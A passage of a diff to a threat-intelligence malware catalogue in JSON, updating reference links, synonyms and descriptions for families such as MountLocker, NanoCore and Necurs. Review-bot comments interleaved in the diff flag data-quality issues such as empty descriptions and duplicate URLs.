"https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Worm:Win32/Morto.A",
+ "https://www.f-secure.com/weblog/archives/00002227.html",
"http://contagiodump.blogspot.com/2011/08/aug-28-morto-tsclient-rdp-worm-with.html"
],
"synonyms": [],
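Review bot: the new MortalKombat entry has an empty `description` even though the cited Talos post title already identifies it as ransomware; a short line along those lines would help users searching the galaxy. The rest of the hunk only reorders the two existing Morto refs and carries no content change.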
@@ -32751,12 +34547,14 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.mosquito",
- "https://www.welivesecurity.com/2020/03/12/tracking-turla-new-backdoor-armenian-watering-holes/",
+ "https://www.secureworks.com/research/threat-profiles/iron-hunter",
+ "https://www.welivesecurity.com/2018/05/22/turla-mosquito-shift-towards-generic-tools/",
"https://www.recordedfuture.com/turla-apt-infrastructure/",
"https://securelist.com/shedding-skin-turlas-fresh-faces/88069/",
- "https://www.secureworks.com/research/threat-profiles/iron-hunter",
+ "https://cocomelonc.github.io/tutorial/2022/05/02/malware-pers-3.html",
"https://www.welivesecurity.com/wp-content/uploads/2018/01/ESET_Turla_Mosquito.pdf",
- "https://www.welivesecurity.com/2018/05/22/turla-mosquito-shift-towards-generic-tools/"
+ "https://www.welivesecurity.com/2020/03/12/tracking-turla-new-backdoor-armenian-watering-holes/",
+ "https://go.recordedfuture.com/hubfs/reports/cta-2020-0312.pdf"
],
"synonyms": [],
"type": []
@@ -32765,34 +34563,42 @@
"value": "Mosquito"
},
{
- "description": "",
+ "description": "According to BlackBerry, MountLocker is a Ransomware-as-a-Service (RaaS), active since July 2020\r\nThe MountLocker ransomware was updated during early November 2020 to broaden the targeting of file types and evade security software.\r\nVictim’s files are encrypted using ChaCha20, and file encryption keys are encrypted using RSA-2048.\r\nThe ransomware appears to be somewhat secure; there are no trivial weaknesses allowing for easy key recovery and decryption of data. MountLocker does however use a cryptographically insecure method for key generation that may be prone to attack.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.mount_locker",
- "https://www.trendmicro.com/en_us/research/21/j/ransomware-operators-found-using-new-franchise-business-model.html",
- "https://www.bleepingcomputer.com/news/security/mount-locker-ransomware-joins-the-multi-million-dollar-ransom-game/",
- "https://dissectingmalwa.re/between-a-rock-and-a-hard-place-exploring-mount-locker-ransomware.html",
- "https://securityintelligence.com/posts/itg23-crypters-cooperation-between-cybercriminal-groups/",
- "https://www.bleepingcomputer.com/news/security/mount-locker-ransomware-now-targets-your-turbotax-tax-returns/",
- "https://chuongdong.com/reverse%20engineering/2021/05/23/MountLockerRansomware/",
- "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/",
- "https://kienmanowar.wordpress.com/2021/08/04/quicknote-mountlocker-some-pseudo-code-snippets/",
- "https://securityscorecard.pathfactory.com/research/quantum-ransomware",
"https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3",
- "https://www.guidepointsecurity.com/mount-locker-ransomware-steps-up-counter-ir-capabilities/",
- "https://news.sophos.com/en-us/2021/03/31/sophos-mtr-in-real-time-what-is-astro-locker-team/",
- "https://www.bleepingcomputer.com/news/security/biotech-research-firm-miltenyi-biotec-hit-by-ransomware-data-leaked/",
- "https://www.crowdstrike.com/blog/prophet-spider-exploits-oracle-weblogic-to-facilitate-ransomware-activity/",
"https://intel471.com/blog/how-cybercriminals-create-turbulence-for-the-transportation-industry",
- "https://www.cybereason.com/blog/cybereason-vs.-quantum-locker-ransomware",
- "https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE54L7v",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-virtual-machines",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
"https://github.com/Finch4/Malware-Analysis-Reports/tree/main/MountLocker",
+ "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/",
+ "https://www.bleepingcomputer.com/news/security/biotech-research-firm-miltenyi-biotec-hit-by-ransomware-data-leaked/",
"https://blogs.blackberry.com/en/2021/11/zebra2104",
- "https://blogs.blackberry.com/en/2020/12/mountlocker-ransomware-as-a-service-offers-double-extortion-capabilities-to-affiliates"
+ "https://news.sophos.com/en-us/2021/03/31/sophos-mtr-in-real-time-what-is-astro-locker-team/",
+ "https://www.cybereason.com/blog/cybereason-vs.-quantum-locker-ransomware",
+ "https://www.intezer.com/blog/malware-analysis/how-threat-actors-abuse-lnk-files/",
+ "https://blogs.blackberry.com/en/2020/12/mountlocker-ransomware-as-a-service-offers-double-extortion-capabilities-to-affiliates",
+ "https://noticeofpleadings.com/crackedcobaltstrike/files/ComplaintAndSummons/1%20-Microsoft%20Cobalt%20Strike%20-%20Complaint(907040021.9).pdf",
+ "https://www.guidepointsecurity.com/mount-locker-ransomware-steps-up-counter-ir-capabilities/",
+ "https://www.microsoft.com/en-us/security/blog/2022/10/25/dev-0832-vice-society-opportunistic-ransomware-campaigns-impacting-us-education-sector/",
+ "https://www.bleepingcomputer.com/news/security/mount-locker-ransomware-joins-the-multi-million-dollar-ransom-game/",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-virtual-machines",
+ "https://community.riskiq.com/article/47766fbd",
+ "https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/",
+ "https://chuongdong.com/reverse%20engineering/2021/05/23/MountLockerRansomware/",
+ "https://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/",
+ "https://securityscorecard.pathfactory.com/research/quantum-ransomware",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
+ "https://www.bleepingcomputer.com/news/security/mount-locker-ransomware-now-targets-your-turbotax-tax-returns/",
+ "https://securityintelligence.com/posts/itg23-crypters-cooperation-between-cybercriminal-groups/",
+ "https://kienmanowar.wordpress.com/2021/08/04/quicknote-mountlocker-some-pseudo-code-snippets/",
+ "https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE54L7v",
+ "https://www.crowdstrike.com/blog/prophet-spider-exploits-oracle-weblogic-to-facilitate-ransomware-activity/",
+ "https://dissectingmalwa.re/between-a-rock-and-a-hard-place-exploring-mount-locker-ransomware.html",
+ "https://www.trendmicro.com/en_us/research/21/j/ransomware-operators-found-using-new-franchise-business-model.html"
],
"synonyms": [
+ "DagonLocker",
+ "MountLocker",
"QuantumLocker"
],
"type": []
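Review bot: `"MountLocker"` is added to `synonyms`; if the cluster's `value` (outside this hunk) is already that string, the synonym duplicates it and should be dropped, and if the value is spelled with a space, the description should say the two spellings are the same family. Two smaller points on the new description: it uses `\r\n` line breaks, so check that matches the convention used by other descriptions in this file, and it is attributed to BlackBerry in the text, which is good, but the claim that key generation is "cryptographically insecure" is stated without saying what the weakness is; quoting the specific finding from the BlackBerry post would make it verifiable.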
@@ -32817,8 +34623,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.mozart",
- "https://github.com/malware-kitten/securitykitten.github.io/blob/master/_posts/2015-01-11-the-mozart-ram-scraper.md",
- "https://securitykitten.github.io/2015/01/11/the-mozart-ram-scraper.html"
+ "https://securitykitten.github.io/2015/01/11/the-mozart-ram-scraper.html",
+ "https://github.com/malware-kitten/securitykitten.github.io/blob/master/_posts/2015-01-11-the-mozart-ram-scraper.md"
],
"synonyms": [],
"type": []
@@ -32842,6 +34648,21 @@
"uuid": "2363dc9f-822a-4581-8d5f-1fc436e70621",
"value": "MPKBot"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mqsttang",
+ "https://www.welivesecurity.com/2023/03/02/mqsttang-mustang-panda-latest-backdoor-treads-new-ground-qt-mqtt/"
+ ],
+ "synonyms": [
+ "QMAGENT"
+ ],
+ "type": []
+ },
+ "uuid": "aed28126-b8ab-4ab5-a2c6-89898fe689c9",
+ "value": "MQsTTang"
+ },
{
"description": "Ransomware.",
"meta": {
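Review bot: the new MQsTTang cluster ships with an empty `description` even though its only non-Malpedia ref already summarises the family in its slug (a Mustang Panda backdoor built on Qt with MQTT for C2); a one-sentence description drawn from that ESET post would make the entry useful on its own. Structure is fine: `meta` closes where it should and `uuid`/`value` sit at cluster level like the neighbouring entries.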
@@ -32927,10 +34748,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.murofet",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf",
- "https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf",
+ "https://www.secureworks.com/research/evolution-of-the-gold-evergreen-threat-group",
"https://www.wired.com/2017/03/russian-hacker-spy-botnet/",
- "https://www.secureworks.com/research/evolution-of-the-gold-evergreen-threat-group"
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf",
+ "https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf"
],
"synonyms": [],
"type": []
@@ -32972,11 +34793,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.mydoom",
- "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf",
+ "https://www.malware-traffic-analysis.net/2018/12/19/index.html",
"https://www.giac.org/paper/gcih/568/mydoom-dom-anlysis-mydoom-virus/106069",
- "https://www.giac.org/paper/gcih/619/mydoom-backdoor/106503",
+ "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf",
"http://ivanlef0u.fr/repo/madchat/vxdevl/papers/analysis/mydoom_b_analysis.pdf",
- "https://www.malware-traffic-analysis.net/2018/12/19/index.html"
+ "https://www.giac.org/paper/gcih/619/mydoom-backdoor/106503"
],
"synonyms": [
"Mimail",
@@ -32992,12 +34813,12 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.mykings_spreader",
+ "http://blog.netlab.360.com/mykings-the-botnet-behind-multiple-active-spreading-botnets/",
+ "http://download.ahnlab.com/kr/site/library/[AhnLab]Analysis%20Report_MyKings%20Botnet.pdf",
+ "https://www.proofpoint.com/us/threat-insight/post/smominru-monero-mining-botnet-making-millions-operators",
"https://sophos.files.wordpress.com/2019/12/mykings_report_final.pdf",
"https://decoded.avast.io/janrubin/the-king-is-dead-long-live-mykings/",
- "https://www.proofpoint.com/us/threat-insight/post/smominru-monero-mining-botnet-making-millions-operators",
- "http://download.ahnlab.com/kr/site/library/[AhnLab]Analysis%20Report_MyKings%20Botnet.pdf",
- "https://blog.talosintelligence.com/2020/07/valak-emerges.html",
- "http://blog.netlab.360.com/mykings-the-botnet-behind-multiple-active-spreading-botnets/"
+ "https://blog.talosintelligence.com/2020/07/valak-emerges.html"
],
"synonyms": [],
"type": []
@@ -33012,9 +34833,10 @@
"https://malpedia.caad.fkie.fraunhofer.de/details/win.mylobot",
"http://blog.talosintelligence.com/2017/10/threat-round-up-1020-1017.html",
"https://www.deepinstinct.com/2018/06/20/meet-mylobot-a-new-highly-sophisticated-never-seen-before-botnet-thats-out-in-the-wild/",
+ "https://www.bitsight.com/blog/mylobot-investigating-proxy-botnet",
"https://blogs.akamai.com/sitr/2021/01/detecting-mylobot-unseen-dga-based-malware-using-deep-learning.html",
- "https://github.com/360netlab/DGA/issues/36",
"https://blog.centurylink.com/mylobot-continues-global-infections/",
+ "https://github.com/360netlab/DGA/issues/36",
"http://www.freebuf.com/column/153424.html"
],
"synonyms": [
@@ -33059,10 +34881,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.n40",
- "https://socprime.com/en/news/attackers-exploit-dll-hijacking-to-bypass-smartscreen/",
- "https://www.slideshare.net/elevenpaths/n40-the-botnet-created-in-brazil-which-evolves-to-attack-the-chilean-banking-sector",
"http://blog.en.elevenpaths.com/2018/05/new-report-malware-attacks-chilean.html",
- "http://reversingminds-blog.logdown.com/posts/7807545-analysis-of-advanced-brazilian-banker-malware"
+ "https://socprime.com/en/news/attackers-exploit-dll-hijacking-to-bypass-smartscreen/",
+ "http://reversingminds-blog.logdown.com/posts/7807545-analysis-of-advanced-brazilian-banker-malware",
+ "https://www.slideshare.net/elevenpaths/n40-the-botnet-created-in-brazil-which-evolves-to-attack-the-chilean-banking-sector"
],
"synonyms": [],
"type": []
@@ -33087,11 +34909,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.nachocheese",
- "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf",
- "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-239b",
- "https://baesystemsai.blogspot.com/2017/02/lazarus-false-flag-malware.html",
"https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/pf/apt/rpt-apt38-2018.pdf",
- "https://www.welivesecurity.com/2017/02/16/demystifying-targeted-malware-used-polish-banks/"
+ "https://www.welivesecurity.com/2017/02/16/demystifying-targeted-malware-used-polish-banks/",
+ "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf",
+ "https://baesystemsai.blogspot.com/2017/02/lazarus-false-flag-malware.html",
+ "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-239b"
],
"synonyms": [
"Cyruslish",
@@ -33138,55 +34960,59 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.nanocore",
- "https://blog.360totalsecurity.com/en/vendetta-new-threat-actor-from-europe/",
- "https://umbrella.cisco.com/blog/navigating-cybersecurity-during-a-pandemic-latest-malware-and-threat-actors",
- "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/how-cybercriminals-abuse-cloud-tunneling-services",
- "https://www.zscaler.com/blogs/security-research/catching-rats-over-custom-protocols",
- "https://blog.talosintelligence.com/2020/02/coronavirus-themed-malware.html",
- "https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf",
- "https://medium.com/@the_abjuri5t/nanocore-rat-hunting-guide-cb185473c1e0",
- "https://community.riskiq.com/article/ade260c6",
- "https://www.proofpoint.com/us/blog/threat-insight/threat-actor-profile-ta2719-uses-colorful-lures-deliver-rats-local-languages",
- "https://www.proofpoint.com/us/threat-insight/post/new-whiteshadow-downloader-uses-microsoft-sql-retrieve-malware",
- "https://www.gdatasoftware.com/blog/global-pandemic-remcos-tesla-netwire",
- "https://www.trendmicro.com/en_us/research/21/k/campaign-abusing-rats-uses-fake-websites.html",
- "https://us-cert.cisa.gov/ncas/alerts/aa20-345a",
- "https://assets.virustotal.com/reports/2021trends.pdf",
- "https://www.ciphertechsolutions.com/roboski-global-recovery-automation/",
- "https://www.secureworks.com/research/threat-profiles/cobalt-trinity",
- "https://mp.weixin.qq.com/s/mstwBMkS0G3Et4GOji2mwA",
- "https://medium.com/@M3HS1N/malware-analysis-nanocore-rat-6cae8c6df918",
- "https://securityintelligence.com/posts/roboski-global-recovery-automation/",
- "https://goggleheadedhacker.com/blog/post/11",
- "https://medium.com/@mariohenkel/decrypting-nanocore-config-and-dump-all-plugins-f4944bfaba52?sk=00be46bc5bf99e8ab67369152ceb0332",
- "https://labs.bitdefender.com/2020/03/5-times-more-coronavirus-themed-malware-reports-during-march/?utm_campaign=twitter&utm_medium=twitter&utm_source=twitter",
- "https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord",
- "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/",
- "https://www.ic3.gov/media/news/2020/200917-1.pdf",
"https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/image-file-trickery-part-ii-fake-icon-delivers-nanocore/",
- "https://malwareindepth.com/defeating-nanocore-and-cypherit/",
- "https://www.zscaler.com/blogs/research/multistage-freedom-loader-used-spread-azorult-and-nanocore-rat",
- "https://www.trendmicro.com/en_us/research/21/i/Water-Basilisk-Uses-New-HCrypt-Variant-to-Flood-Victims-with-RAT-Payloads.html",
- "https://github.com/threatland/TL-TROJAN/tree/master/TL.RAT/RAT.Win.Nanocore",
- "https://threatrecon.nshc.net/2019/09/19/sectorh01-continues-abusing-web-services/",
- "https://zero2auto.com/2020/06/07/dealing-with-obfuscated-macros/",
- "https://blog.talosintelligence.com/2022/01/nanocore-netwire-and-asyncrat-spreading.html",
- "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html",
- "https://medium.com/@mariohenkel/decrypting-nanocore-config-and-dump-all-plugins-f4944bfaba52",
- "https://intel471.com/blog/privateloader-malware",
- "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf",
- "https://www.crowdstrike.com/blog/weaponizing-disk-image-files-analysis/",
+ "https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/",
+ "https://securityintelligence.com/posts/roboski-global-recovery-automation/",
+ "https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf",
+ "https://goggleheadedhacker.com/blog/post/11",
+ "https://www.ic3.gov/media/news/2020/200917-1.pdf",
+ "https://labs.bitdefender.com/2020/03/5-times-more-coronavirus-themed-malware-reports-during-march/?utm_campaign=twitter&utm_medium=twitter&utm_source=twitter",
+ "https://medium.com/@mariohenkel/decrypting-nanocore-config-and-dump-all-plugins-f4944bfaba52?sk=00be46bc5bf99e8ab67369152ceb0332",
+ "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/elfin-apt33-espionage",
+ "https://blog.talosintelligence.com/2020/02/coronavirus-themed-malware.html",
+ "https://www.cisecurity.org/insights/blog/top-10-malware-march-2022",
+ "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/how-cybercriminals-abuse-cloud-tunneling-services",
+ "https://www.secureworks.com/research/threat-profiles/cobalt-trinity",
"https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html",
"https://community.riskiq.com/article/24759ad2",
- "https://blog.360totalsecurity.com/en/bayworld-event-cyber-attack-against-foreign-trade-industry/",
- "https://www.proofpoint.com/us/blog/threat-insight/new-threat-actor-spoofs-philippine-government-covid-19-health-data-widespread",
+ "https://intel471.com/blog/privateloader-malware",
+ "https://www.secureworks.com/research/darktortilla-malware-analysis",
"https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf",
- "https://blog.morphisec.com/syk-crypter-discord",
- "https://www.bleepingcomputer.com/news/security/nanocore-rat-author-gets-33-months-in-prison/",
- "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/elfin-apt33-espionage",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf",
+ "https://zero2auto.com/2020/06/07/dealing-with-obfuscated-macros/",
+ "https://malwareindepth.com/defeating-nanocore-and-cypherit/",
+ "https://www.proofpoint.com/us/threat-insight/post/new-whiteshadow-downloader-uses-microsoft-sql-retrieve-malware",
+ "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/",
+ "https://threatrecon.nshc.net/2019/09/19/sectorh01-continues-abusing-web-services/",
+ "https://github.com/threatland/TL-TROJAN/tree/master/TL.RAT/RAT.Win.Nanocore",
+ "https://www.proofpoint.com/us/blog/threat-insight/threat-actor-profile-ta2719-uses-colorful-lures-deliver-rats-local-languages",
+ "https://www.ciphertechsolutions.com/roboski-global-recovery-automation/",
"https://blog.talosintelligence.com/2021/04/a-year-of-fajan-evolution-and-bloomberg.html",
+ "https://community.riskiq.com/article/ade260c6",
+ "https://blog.morphisec.com/syk-crypter-discord",
+ "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html",
+ "https://www.zscaler.com/blogs/security-research/catching-rats-over-custom-protocols",
+ "https://medium.com/@M3HS1N/malware-analysis-nanocore-rat-6cae8c6df918",
+ "https://blog.360totalsecurity.com/en/bayworld-event-cyber-attack-against-foreign-trade-industry/",
+ "https://medium.com/@the_abjuri5t/nanocore-rat-hunting-guide-cb185473c1e0",
+ "https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord",
+ "https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage",
+ "https://us-cert.cisa.gov/ncas/alerts/aa20-345a",
+ "https://www.gdatasoftware.com/blog/global-pandemic-remcos-tesla-netwire",
+ "https://www.zscaler.com/blogs/research/multistage-freedom-loader-used-spread-azorult-and-nanocore-rat",
+ "https://www.trendmicro.com/en_us/research/21/k/campaign-abusing-rats-uses-fake-websites.html",
+ "https://umbrella.cisco.com/blog/navigating-cybersecurity-during-a-pandemic-latest-malware-and-threat-actors",
+ "https://www.crowdstrike.com/blog/weaponizing-disk-image-files-analysis/",
+ "https://mp.weixin.qq.com/s/mstwBMkS0G3Et4GOji2mwA",
"https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/elfin-indictments-iran-espionage",
- "https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage"
+ "https://www.proofpoint.com/us/blog/threat-insight/new-threat-actor-spoofs-philippine-government-covid-19-health-data-widespread",
+ "https://blog.talosintelligence.com/2022/01/nanocore-netwire-and-asyncrat-spreading.html",
+ "https://www.bleepingcomputer.com/news/security/nanocore-rat-author-gets-33-months-in-prison/",
+ "https://www.trendmicro.com/en_us/research/21/i/Water-Basilisk-Uses-New-HCrypt-Variant-to-Flood-Victims-with-RAT-Payloads.html",
+ "https://medium.com/@mariohenkel/decrypting-nanocore-config-and-dump-all-plugins-f4944bfaba52",
+ "https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf",
+ "https://assets.virustotal.com/reports/2021trends.pdf",
+ "https://blog.360totalsecurity.com/en/vendetta-new-threat-actor-from-europe/"
],
"synonyms": [
"Nancrat",
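Review bot: after the reorder the list still carries near-duplicates that differ only by host or tracking parameter: the Elfin/APT33 article appears as both symantec-blogs.broadcom.com and www.symantec.com; the mariohenkel Medium post appears with and without `?sk=…`; the Bitdefender link carries `?utm_campaign=…&utm_medium=…&utm_source=…`. The importer should canonicalise URLs (strip `utm_*` and `sk` query parameters, collapse known host migrations) before diffing, otherwise every Malpedia sync re-adds these variants.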
@@ -33209,13 +35035,26 @@
"uuid": "00e1373c-fddf-4b06-9770-e980cc0ada6b",
"value": "NanoLocker"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.naplistener",
+ "https://www.elastic.co/de/security-labs/naplistener-more-bad-dreams-from-the-developers-of-siestagraph"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "c5a291c8-c317-48b4-aad1-d5e9d68c2fc5",
+ "value": "NAPLISTENER"
+ },
{
"description": "",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.narilam",
- "https://www.symantec.com/connect/blogs/w32narilam-business-database-sabotage",
- "http://contagiodump.blogspot.com/2012/12/nov-2012-w32narilam-sample.html"
+ "http://contagiodump.blogspot.com/2012/12/nov-2012-w32narilam-sample.html",
+ "https://www.symantec.com/connect/blogs/w32narilam-business-database-sabotage"
],
"synonyms": [],
"type": []
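Review bot: the Elastic ref for NAPLISTENER points at the `/de/` locale path (`elastic.co/de/security-labs/...`); the locale-free `https://www.elastic.co/security-labs/...` form is the canonical one and avoids a second entry when the English URL is added later. Like MQsTTang, the cluster has an empty `description`. The Narilam change in the same hunk is a pure swap of two refs.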
@@ -33228,22 +35067,13 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.nautilus",
- "https://www.ncsc.gov.uk/alerts/turla-group-malware",
"https://www.secureworks.com/research/threat-profiles/iron-hunter",
+ "https://www.ncsc.gov.uk/alerts/turla-group-malware",
"https://www.ncsc.gov.uk/news/turla-group-exploits-iran-apt-to-expand-coverage-of-victims"
],
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "73cb7ecc-25e3-11e8-a97b-c35ec4e7dcf8",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "d8295eba-60ef-4900-8091-d694180de565",
"value": "Nautilus"
},
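Review bot: this hunk deletes the whole `related` array, i.e. the `similar` link from Nautilus to dest-uuid 73cb7ecc-25e3-11e8-a97b-c35ec4e7dcf8 with its estimative-language tag, and nothing in the diff replaces it. If the Malpedia importer regenerates clusters from scratch, hand-curated cross-galaxy relations get silently dropped on every sync; either carry `related` over from the previous file or justify the removal in the commit message. The ref changes themselves are a reorder only.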
@@ -33252,11 +35082,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.navrat",
- "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf",
+ "https://norfolkinfosec.com/how-to-analyzing-a-malicious-hangul-word-processor-document-from-a-dprk-threat-actor-group/",
+ "https://www.youtube.com/watch?v=rfzmHjZX70s",
"https://blog.talosintelligence.com/2018/05/navrat.html?m=1",
"https://i.blackhat.com/asia-21/Friday-Handouts/as-21-Kuo-We-Are-About-To-Land-How-CloudDragon-Turns-A-Nightmare-Into-Reality.pdf",
- "https://www.youtube.com/watch?v=rfzmHjZX70s",
- "https://norfolkinfosec.com/how-to-analyzing-a-malicious-hangul-word-processor-document-from-a-dprk-threat-actor-group/"
+ "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf"
],
"synonyms": [
"JinhoSpy"
@@ -33271,14 +35101,14 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.ncctrojan",
- "https://www.socinvestigation.com/chinese-new-backdoor-deployed-for-cyberespionage/",
- "https://vblocalhost.com/uploads/VB2020-20.pdf",
- "https://sebdraven.medium.com/actor-behind-operation-lagtime-targets-russia-f8c277dc52a9",
- "https://twitter.com/ESETresearch/status/1441139057682104325?s=20",
"https://vblocalhost.com/uploads/VB2020-Ozawa-etal.pdf",
- "https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-Targeted-attack-on-industrial-enterprises-and-public-institutions-En.pdf",
+ "https://www.youtube.com/watch?v=1WfPlgtfWnQ",
"https://insight-jp.nttsecurity.com/post/102gr6l/ta428ncctrojan",
- "https://www.youtube.com/watch?v=1WfPlgtfWnQ"
+ "https://sebdraven.medium.com/actor-behind-operation-lagtime-targets-russia-f8c277dc52a9",
+ "https://vblocalhost.com/uploads/VB2020-20.pdf",
+ "https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-Targeted-attack-on-industrial-enterprises-and-public-institutions-En.pdf",
+ "https://www.socinvestigation.com/chinese-new-backdoor-deployed-for-cyberespionage/",
+ "https://twitter.com/ESETresearch/status/1441139057682104325?s=20"
],
"synonyms": [],
"type": []
@@ -33291,10 +35121,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.nebulae",
- "https://www.securityweek.com/chinese-cyberspies-target-military-organizations-asia-new-malware",
- "https://www.bitdefender.com/files/News/CaseStudies/study/396/Bitdefender-PR-Whitepaper-NAIKON-creat5397-en-EN.pdf",
"https://www.bleepingcomputer.com/news/security/cyberspies-target-military-organizations-with-new-nebulae-backdoor/",
+ "https://www.securityweek.com/chinese-cyberspies-target-military-organizations-asia-new-malware",
"https://twitter.com/SyscallE/status/1390339497804636166",
+ "https://www.bitdefender.com/files/News/CaseStudies/study/396/Bitdefender-PR-Whitepaper-NAIKON-creat5397-en-EN.pdf",
"https://www.cybereason.com/blog/deadringer-exposing-chinese-threat-actors-targeting-major-telcos"
],
"synonyms": [],
@@ -33308,41 +35138,33 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.necurs",
- "https://intel471.com/blog/a-brief-history-of-ta505",
- "https://research.nccgroup.com/2021/12/01/tracking-a-p2p-network-related-with-ta505/",
- "https://blog.avast.com/botception-with-necurs-botnet-distributes-script-with-bot-capabilities-avast-threat-labs",
- "https://www.trustwave.com/Resources/SpiderLabs-Blog/Necurs-Recurs/",
- "https://www.proofpoint.com/us/threat-insight/post/holiday-lull-not-so-much",
- "https://lokalhost.pl/txt/peering.into.spam.botnets.VirusBulletin2017.pdf",
- "http://www.secureworks.com/research/threat-profiles/gold-riverview",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/necurs-evolves-to-evade-spam-detection-via-internet-shortcut-file/",
- "https://www.shadowserver.org/news/has-the-sun-set-on-the-necurs-botnet/",
- "https://cofense.com/necurs-targeting-banks-pub-file-drops-flawedammyy/",
- "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/",
"https://blogs.microsoft.com/on-the-issues/2020/03/10/necurs-botnet-cyber-crime-disrupt/",
- "https://www.secureworks.com/research/threat-profiles/gold-riverview",
- "https://www.blueliv.com/wp-content/uploads/2018/07/Blueliv-Necurs-report-2017.pdf",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
+ "https://www.proofpoint.com/us/threat-insight/post/holiday-lull-not-so-much",
"http://blog.talosintelligence.com/2017/03/necurs-diversifies.html",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/necurs-evolves-to-evade-spam-detection-via-internet-shortcut-file/",
